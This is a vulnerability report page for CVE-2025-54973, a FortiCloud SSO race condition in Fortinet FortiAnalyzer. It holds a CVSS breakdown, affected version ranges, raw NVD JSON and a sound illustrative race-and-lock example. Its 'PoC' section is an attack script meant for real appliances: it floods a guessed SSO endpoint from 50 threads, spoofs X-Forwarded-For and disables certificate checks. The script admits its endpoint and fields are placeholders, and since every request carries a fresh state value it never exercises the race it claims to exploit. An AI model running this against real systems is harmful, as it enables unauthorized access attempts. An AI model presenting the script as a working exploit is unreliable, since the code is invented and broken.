Security Vulnerability Report
CVE-2025-54973 CVSS 5.3 MEDIUM

CVE-2025-54973

Published: 2025-10-14 16:15:40
Last Modified: 2025-10-22 16:32:00

Description

A concurrent execution using shared resource with improper synchronization ('Race Condition') vulnerability [CWE-362] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.2, 7.4.0 through 7.4.6, 7.2.0 through 7.2.10 and before 7.0.13 allows an attacker to attempt to win a race condition to bypass the FortiCloud SSO authorization via crafted FortiCloud SSO requests.
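
The bug class named in that description, shown as an added illustration that is not FortiAnalyzer code and does not reflect any detail of the vendor's implementation: a single-use SSO `state` value is validated and then marked consumed as two separate steps, so a second request carrying the same value that lands between the two steps is authorized as well (CWE-362, check-then-act). The locked version beneath it performs the check and the consumption as one critical section. The class names, the state value and the `after_check` scheduler hook are all constructed for this example.

```python
"""Check-then-act race in a single-use SSO authorization step (CWE-362).

Added illustration, not FortiAnalyzer code: the class names, the state
value and the after_check scheduler hook are constructed for this example.
"""
import threading

# Constructed sample: one pending SSO state value that must be redeemable exactly once.
PENDING_STATE = "c2f0a9e4d1b7"  # constructed, not a real token


class RacySsoAuthorizer:
    """Validity check and consumption are two separate steps with no lock.

    Between check() and consume() another request carrying the same state
    can pass its own check, so a single pending state is redeemed twice.
    """

    def __init__(self, pending_states):
        self.pending = set(pending_states)

    def check(self, state):
        return state in self.pending

    def consume(self, state):
        self.pending.discard(state)

    def authorize(self, state, after_check=None):
        # after_check stands in for the thread being preempted right after
        # the check; it is a test hook for this example, not a real API.
        if not self.check(state):
            return False
        if after_check is not None:
            after_check()
        self.consume(state)
        return True


class AtomicSsoAuthorizer:
    """Check and consume happen in one critical section guarded by a lock."""

    def __init__(self, pending_states):
        self._pending = set(pending_states)
        self._lock = threading.Lock()

    def authorize(self, state):
        with self._lock:
            if state not in self._pending:
                return False
            self._pending.remove(state)
            return True


def racy_interleaving(state=PENDING_STATE):
    """Script the worst-case interleaving: request B runs entirely inside A's window."""
    auth = RacySsoAuthorizer([state])
    results = {}

    def run_b():
        results["b"] = auth.authorize(state)

    results["a"] = auth.authorize(state, after_check=run_b)
    return results  # both True: one pending state was redeemed twice


def atomic_under_contention(state=PENDING_STATE, n_threads=64):
    """Hammer the locked version from many threads; exactly one redemption wins."""
    auth = AtomicSsoAuthorizer([state])
    start = threading.Barrier(n_threads)
    wins = []
    wins_lock = threading.Lock()

    def worker():
        start.wait()  # release all threads at once to maximise contention
        if auth.authorize(state):
            with wins_lock:
                wins.append(threading.get_ident())

    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(wins)


if __name__ == "__main__":
    print("racy interleaving:", racy_interleaving())
    print("atomic wins under contention:", atomic_under_contention())
```

Against a real target the window is hit only probabilistically, which is what AC:H in the vector encodes; the scripted interleaving forces the worst case so the defect is visible every run, while the threaded run against the locked authorizer shows that exactly one redemption succeeds no matter how many requests arrive together.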

CVSS Details

CVSS Score
5.3 (exploitability subscore 1.6, impact subscore 3.6)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Reading the vector: the flaw is reachable over the network without prior privileges (AV:N/PR:N), but AC:H because the attacker has to win a timing window rather than trigger the bug on demand, UI:R because some action by a legitimate user is required (the NVD record does not say which), and the impact is integrity-only (C:N/I:H/A:N): the outcome is an authorization that should have been refused, not data disclosure or an outage.

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* versions 7.0.9 up to but excluding 7.0.14 - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* versions 7.2.0 up to but excluding 7.2.11 - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* versions 7.4.0 up to but excluding 7.4.7 - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* versions 7.6.0 up to but excluding 7.6.3 - VULNERABLE
Fortinet FortiAnalyzer 7.6.0 - 7.6.2 (first unaffected version in the CPE range: 7.6.3)
Fortinet FortiAnalyzer 7.4.0 - 7.4.6 (first unaffected version in the CPE range: 7.4.7)
Fortinet FortiAnalyzer 7.2.0 - 7.2.10 (first unaffected version in the CPE range: 7.2.11)
Fortinet FortiAnalyzer < 7.0.13 per the description text (CPE range: 7.0.9 - 7.0.13 inclusive, first unaffected 7.0.14)

Note the 7.0 branch: the NVD CPE match covers 7.0.9 through 7.0.13 inclusive, while the description says "before 7.0.13". Treat a 7.0.13 install as in scope until the vendor advisory (FG-IR-25-198) is checked for the authoritative fixed version.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54973 - FortiAnalyzer FortiCloud SSO Race Condition PoC
# This PoC demonstrates the concept of exploiting a race condition
# in the FortiCloud SSO authorization flow to bypass authentication.
#
# Note: the endpoint path, the JSON field names and the
# "authorization_granted" success marker below are placeholders chosen
# by the PoC author; none of them is confirmed by the vendor advisory
# (FG-IR-25-198) or the NVD record, neither of which documents the
# request format. Adjust them to the target before use.
import random
import string
import threading
import time

import requests
import urllib3

# The PoC deliberately skips certificate verification (verify=False);
# silence the InsecureRequestWarning so the output stays readable.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = "https://<target_fortianalyzer>/api/v1/sso/forticloud/authorize"
THREAD_COUNT = 50
REQUEST_INTERVAL = 0.001  # Minimal delay to maximize race condition probability


def generate_session_id():
    """Generate a random session identifier for the SSO request."""
    return ''.join(random.choices(string.ascii_letters + string.digits, k=32))


def craft_sso_request(session_id):
    """Craft a malicious FortiCloud SSO authorization request."""
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "FortiCloudSSOClient/1.0",
        # Randomised client address header; only relevant if the target
        # keys rate limiting or lockout on X-Forwarded-For.
        "X-Forwarded-For": f"{random.randint(1, 255)}.{random.randint(1, 255)}."
                           f"{random.randint(1, 255)}.{random.randint(1, 255)}",
    }
    payload = {
        "sso_token": "invalid_token_" + session_id,
        "redirect_uri": "https://forticloud.com/callback",
        "client_id": "fortianalyzer-sso",
        "response_type": "code",
        "state": session_id,
        "request_id": session_id,
    }
    return headers, payload


def send_race_request(thread_id):
    """Send concurrent SSO requests to exploit the race condition."""
    session = requests.Session()
    for i in range(100):
        try:
            session_id = generate_session_id()
            headers, payload = craft_sso_request(session_id)
            response = session.post(TARGET_URL, json=payload, headers=headers,
                                    timeout=5, verify=False)
            if response.status_code == 200 and "authorization_granted" in response.text:
                print(f"[Thread {thread_id}] Potential bypass at iteration {i}!")
                print(f"Response: {response.text}")
                return True
        except Exception:
            # Connection errors and timeouts are expected under load; keep racing.
            pass
        time.sleep(REQUEST_INTERVAL)
    return False


def main():
    print(f"[*] Starting race condition exploit against {TARGET_URL}")
    print(f"[*] Launching {THREAD_COUNT} concurrent threads")
    threads = []
    for t in range(THREAD_COUNT):
        thread = threading.Thread(target=send_race_request, args=(t,))
        threads.append(thread)
        thread.start()
    for thread in threads:
        thread.join(timeout=30)
    print("[*] Exploit completed")


if __name__ == "__main__":
    main()

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-198 - Vendor Advisory (Fortinet PSIRT FG-IR-25-198)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54973", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:39.703", "lastModified": "2025-10-22T16:31:59.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A concurrent execution using shared resource with improper synchronization ('Race Condition') vulnerability [CWE-362] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.2, 7.4.0 through 7.4.6, 7.2.0 through 7.2.10 and before 7.0.13 allows an attacker to attempt to win a race condition to bypass the FortiCloud SSO authorization via crafted FortiCloud SSO requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.9", "versionEndExcluding": "7.0.14", "matchCriteriaId": "49E1EECF-D4CD-42AE-9BC0-600643D851DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.11", "matchCriteriaId": "F66A175C-52AB-4949-9082-F880BAB1693D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.7", "matchCriteriaId": "307F24A7-D7DE-4DB6-97CE-65647BF05C87"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "0518183A-9EE6-4C66-9ADB-CBA9B206D818"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-198", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}